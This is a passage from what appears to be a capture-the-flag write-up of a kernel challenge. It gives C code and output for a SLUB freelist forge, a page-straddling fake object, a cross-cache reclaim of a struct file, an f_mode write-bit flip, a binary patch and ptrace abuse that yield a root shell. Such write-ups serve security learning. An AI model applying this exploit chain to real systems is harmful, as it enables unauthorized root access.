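                            uint64_t slot, uint64_t target) {
    assert((target & 7) == 0); /* sketch-only sanity check */
    uint64_t enc = target ^ random ^ bswap64(slot);
    memcpy(win + FREEPTR_IDX, &enc, sizeof(enc));
}
```

In the exploit the window would come from mf_read(..., 0x98, ...) and go back with mf_write(); calling window_set_next() with target 0 is the "re-encode NULL" step that leaves the cache clean.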

Finding contiguous pages

Allocating the fake object isn’t free: CREATE uses kmem_cache_zalloc, which zeroes 0xa0 bytes from page+0xfc0 — and 0x60 of those land in the next physical page. We then read and write that straddle window. So the page at page+0x1000 can’t be arbitrary kernel memory; it has to be a slab page we own, or we corrupt something random and (best case) panic. So before allocating anything at a page tail we first locate a pair of physically adjacent multifiles pages A, B with B == A + 0x1000.

cache_random makes this cheap. The base of any full page falls out of a single NULL-terminated freeptr: free the page’s last object (pos24, at base+0xf00) and its next becomes NULL, so the encoded word is just random ^ bswap64(base+0xf50). Read it through the live pos23 and invert:

// free pos24 -> next == NULL; read its freeptr via the live pos23
mf_delete(fds[last/PERFD], last%PERFD);
mf_read (fds[prev/PERFD], prev%PERFD, 0x98, leak, sizeof(leak));
memcpy(&enc, leak + 0x38, 8);
uint64_t base = bsw(enc ^ random) - 0xf50;   // pos24+0x50 = bsw(enc^random)

Right after decode/poison the cache holds nothing but the full page0, so a plain sequential spray lays down fresh pages page1, page2, … in allocation order — object gi sits at scan_page(gi/25) + (gi%25)*0xa0. We spray SCAN_PAGES of them, decode every base, and look for B == A + 0x1000:

[~] root
[+] A=0xffff9de3419c2000  B=0xffff9de3419c3000

The buddy allocator hands out order-0 pages from contiguous runs often enough that a few dozen are almost always enough to contain an adjacent pair. A is the page whose tail object we’ll poison; B is the page the fake object reaches into.
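
The scan itself is just "decode every base, then look for a +0x1000 neighbor". A minimal sketch, with hypothetical helper names and a plain quadratic search (fine for a few dozen pages):

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define PAGE_SIZE_4K 0x1000
#define TAIL_SLOT    0xf50  /* pos24 + 0x50 */

static uint64_t bswap64(uint64_t x) {
    uint64_t r = 0;
    for (int i = 0; i < 8; i++) {
        r = (r << 8) | (x & 0xff);
        x >>= 8;
    }
    return r;
}

/* With next == NULL the encoded word is random ^ bswap64(base + 0xf50). */
static uint64_t base_from_tail_word(uint64_t enc, uint64_t random) {
    return bswap64(enc ^ random) - TAIL_SLOT;
}

/* Find indices a, b with bases[b] == bases[a] + 0x1000. Returns 1 if found. */
static int find_adjacent_pair(const uint64_t *bases, size_t n,
                              size_t *a, size_t *b) {
    assert(bases != NULL && a != NULL && b != NULL);
    for (size_t i = 0; i < n; i++)
        for (size_t j = 0; j < n; j++)
            if (bases[j] == bases[i] + PAGE_SIZE_4K) {
                *a = i;
                *b = j;
                return 1;
            }
    return 0;
}
```

The pair does not have to be consecutive in spray order, which is why the search compares every page against every other one instead of only neighbors in the array.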

Allocating the fake object

There’s a snag: A is not the cpu slab. The buddy allocator handed pages out in ascending order, so by the time B exists A is already a deactivated full slab, and a plain CREATE won’t touch it. SLUB’s per-cpu partial list fixes that: freeing A’s tail object turns A partial, and once the current cpu slab runs dry the allocator pulls A back and starts handing out its objects again. So we free pos24, forge its next to A+0xfc0, and CREATE twice — the first pops pos24, the second pops A+0xfc0:

mf_delete(fds[last/PERFD], last%PERFD);                 // free A's tail
uint64_t enc = (A + 0xfc0) ^ random ^ bsw(A + 0xf50);   // forge pos24->next
mf_read (fds[prev/PERFD], prev%PERFD, 0x98, leak, sizeof(leak));
memcpy(leak + 0x38, &enc, 8);
mf_write(fds[prev/PERFD], prev%PERFD, 0x98, leak, sizeof(leak));

mf_create(fds[last/PERFD], "reB");        // pops pos24
int fake = mf_create(fake_store, "pad");  // pops A+0xfc0 -> the fake object

fake is a perfectly legal MultiFile whose body runs off the end of A. Its data starts at A+0xfe0, so data[4] is A+0x1000 = B+0 — the first object on the next page. There’s one rule for using it: the copy has to start on A, or the membership check trips. f_pos=0x1f puts the base at A+0xfff (the last byte of A) and spills the following 0x40 bytes into B, so every B field comes back at buf[1 + offset] — a one-byte shift we just carry around.
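
The one-byte shift falls straight out of the address arithmetic. The sketch below, with hypothetical names, computes for a given f_pos where the copy starts and how the window splits between A and B:

```c
#include <assert.h>
#include <stdint.h>

#define PAGE_4K     0x1000
#define FAKE_OFFSET 0xfc0  /* fake object starts here on page A */
#define DATA_OFFSET 0x20   /* offsetof(MultiFile, data) */

struct straddle {
    uint64_t copy_base;   /* kernel address of the first byte copied */
    uint64_t bytes_on_a;  /* leading bytes still on page A */
    uint64_t bytes_on_b;  /* bytes that land on page B, starting at B+0 */
};

static struct straddle straddle_window(uint64_t a_base, uint64_t f_pos,
                                       uint64_t count) {
    assert((a_base & (PAGE_4K - 1)) == 0);
    struct straddle s;
    uint64_t a_end = a_base + PAGE_4K;
    s.copy_base = a_base + FAKE_OFFSET + DATA_OFFSET + f_pos;
    uint64_t end = s.copy_base + count;
    if (s.copy_base >= a_end) {        /* starts on B: membership check trips */
        s.bytes_on_a = 0;
        s.bytes_on_b = count;
    } else if (end <= a_end) {         /* never leaves A */
        s.bytes_on_a = count;
        s.bytes_on_b = 0;
    } else {
        s.bytes_on_a = a_end - s.copy_base;
        s.bytes_on_b = end - a_end;
    }
    return s;
}

/* Index in the user buffer of byte B+x. */
static uint64_t buf_index_of_b(const struct straddle *s, uint64_t x) {
    assert(x < s->bytes_on_b);
    return s->bytes_on_a + x;
}
```

With f_pos = 0x1f and count = 0x40 this gives copy_base = A+0xfff, one byte on A and 0x3f bytes on B, so B+x sits at buf[1 + x] for x in [0, 0x3f).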

That’s the primitive: a controlled read/write into the physical page right after A. Now we make that page hold something worth corrupting.

Reclaiming B as a struct file

B is full of our MultiFiles. To hand its page to another cache we drain it back to the buddy allocator and lean on SLUB’s discard policy. With CONFIG_SLUB_CPU_PARTIAL the per-cpu partial list holds ~10 slabs and the node keeps min_partial = 5 empties; past that, freeing an empty slab discards its page to buddy. So we turn a batch of full pages into empties — 11 to warm the cpu-partial chain, then B plus 9 more to push the discard through:

for (i = 0; i < WARMUP_EMPTY_PAGES; i++) free_full_page(fds, press[i]);       // 11
free_full_page(fds, bp);                                                      // B
for (i = 0; i < TARGET_EMPTY_PAGES - 1; i++) free_full_page(fds, press[11+i]);// 9

Then we poison A’s tail and realize the fake object exactly as before — only now its body straddles into B’s freed physical page. Spraying open("/bin/drop_priv", O_RDONLY|O_NONBLOCK) makes filp_cachep reclaim that page; the first struct file lands at B+0, right under the fake object. After each open we read the straddle window (f_pos=0x1f, so B+x is at buf[1+x]) and test for the file: f_mode is READ|CAN_READ with no WRITE, f_op/f_mapping/f_inode look like kernel pointers, private_data == 0, and f_flags == O_NONBLOCK|O_LARGEFILE.

[+] B reclaimed as /bin/drop_priv struct file after 188 opens
    f_mode=0x004a801d f_flags=0x00008800 f_op=0xffffffff95c1acc0

From f_mode to a root shell

vfs_write() gates on the write bits in file->f_mode, and we have a write primitive into that exact struct file, so we OR them in through the straddle window:

mode |= FMODE_WRITE | FMODE_PWRITE | FMODE_CAN_WRITE;   // at buf[1 + 0x0c]
mf_write(fake_store, fake, 0x1f, buf, 0x40);
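
Spelled out on the buffer, the flip looks roughly like this. It is a sketch: the FMODE_* values are the ones I know from include/linux/fs.h in recent kernels and should be re-checked against the target tree, the 0x0c offset is the one used above, and the helper names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Assumed values from include/linux/fs.h; verify against the target kernel. */
#define FMODE_WRITE     0x2u
#define FMODE_PWRITE    0x10u
#define FMODE_CAN_WRITE 0x40000u

#define WINDOW_LEN 0x40
#define B_SHIFT    1     /* B+x sits at buf[1 + x] when f_pos = 0x1f */
#define F_MODE_OFF 0x0c  /* offset of f_mode inside struct file, as used here */

/* Read f_mode out of a straddle window. */
static uint32_t window_get_fmode(const uint8_t buf[WINDOW_LEN]) {
    uint32_t mode;
    memcpy(&mode, buf + B_SHIFT + F_MODE_OFF, sizeof(mode));
    return mode;
}

/* OR the write bits into f_mode in place and return the new value. */
static uint32_t window_set_write_bits(uint8_t buf[WINDOW_LEN]) {
    assert(B_SHIFT + F_MODE_OFF + sizeof(uint32_t) <= WINDOW_LEN);
    uint32_t mode = window_get_fmode(buf);
    mode |= FMODE_WRITE | FMODE_PWRITE | FMODE_CAN_WRITE;
    memcpy(buf + B_SHIFT + F_MODE_OFF, &mode, sizeof(mode));
    return mode;
}
```

Only the four f_mode bytes change; the rest of the window is written back exactly as it was read, so the neighboring struct file fields keep their values.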

The read-only fd we opened is now writable. /bin/drop_priv just setuid(1000)s and execs a shell, so we only need its two 1000 immediates to become 0. We find them by scanning the binary for the mov edi, 1000 ; call pattern (offsets 0x1514, 0x152f here) and pwrite zeros over them:

patch_drop_priv_fd(target_fd, poff, npoff);   // pwrite 0x00000000 over each 0x000003e8
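
The scan for the immediates can be done on a copy of the binary read into memory. Here is a sketch of how such a scanner might look; it is my guess at the shape of the helper, not the exploit’s actual code. It looks for BF E8 03 00 00 (mov edi, 1000) directly followed by E8 (call rel32) and records the offset of the 32-bit immediate.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* mov edi, 1000 (BF E8 03 00 00) followed by the opcode of call rel32 (E8). */
static const uint8_t UID_PATTERN[] = { 0xbf, 0xe8, 0x03, 0x00, 0x00, 0xe8 };

/* Record the offset of each matching imm32 (one byte past the BF opcode).
 * Returns the number of matches stored, at most max. */
static size_t find_uid_immediates(const uint8_t *img, size_t len,
                                  size_t *offs, size_t max) {
    assert(img != NULL && offs != NULL);
    size_t found = 0;
    for (size_t i = 0; i + sizeof(UID_PATTERN) <= len && found < max; i++)
        if (memcmp(img + i, UID_PATTERN, sizeof(UID_PATTERN)) == 0)
            offs[found++] = i + 1;
    return found;
}

/* In-memory stand-in for the pwrite step: zero each recorded imm32. */
static void zero_immediates(uint8_t *img, size_t len,
                            const size_t *offs, size_t n) {
    for (size_t k = 0; k < n; k++) {
        assert(offs[k] + 4 <= len);
        memset(img + offs[k], 0, 4);
    }
}
```

In the exploit the second step is a pwrite of four zero bytes at each recorded offset through the now-writable fd; zero_immediates() only shows the effect on a buffer.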

Then the handoff. The initrd’s init is an infinite while true; do /bin/drop_priv; done, so we just need the current (uid 1000) shell to exit and the loop re-runs the patched binary. We ptrace the parent shell and rewrite its registers to exit_group(0), pointing rip at a syscall; ret in its vDSO:

make_parent_exit_zero();   // ATTACH parent; rax=__NR_exit_group, rdi=0, rip=vdso syscall;ret

This needs no privileges: we’re still uid 1000, and same-uid ptrace is unprivileged (CAP_SYS_PTRACE is only for crossing a privilege boundary). The kernel also ships without Yama (CONFIG_SECURITY_YAMA unset), so no ptrace_scope blocks attaching to an ancestor. If it failed, TIOCSTI or just killing the shell would do the same.

No kernel payload, no commit_creds, no KASLR-dependent symbol — just a patched suid-like helper. init respawns the shell through the patched drop_priv, and it comes up root:

[~] root
[+] A=0xffff9de3419c2000  B=0xffff9de3419c3000
[+] drop_priv patch offsets: 0x1514 0x152f
[+] B reclaimed as /bin/drop_priv struct file after 188 opens
[+] flipped FMODE_WRITE on the read-only struct file
    patch[0] off=0x1514 old=0x000003e8
    patch[1] off=0x152f old=0x000003e8
[+] patched /bin/drop_priv
[+] forced parent shell exit(0) -> init respawns a root shell
/home/ctf # id
uid=0(root) gid=0(root) groups=0(root)

That’s the whole chain: a base-vs-bounds OOB inside one hardened SLUB cache, turned into a heap leak, a freelist forge, a page-straddling fake object, a cross-cache reclaim, and finally a userland binary patch — bctf{:3} never needed.

Full source code can be found here.

Conclusion

That wraps up both kernel challenges from b01lers 2026. Multifiles was my favorite of the two. Hope it was a useful read.

References

Part 1: throughthewall — the firewall UAF, and the same /bin/drop_priv patch finale from a different write primitive.
KSPP study — protecting heap metadata: how SLAB_FREELIST_HARDENED works.
duasynt — Linux kernel heap feng shui in 2022
sam4k — exploring Linux’s random kmalloc caches
Dirty Pagetable
r1ru — Linux kernel exploitation series

#Kernel #Pwn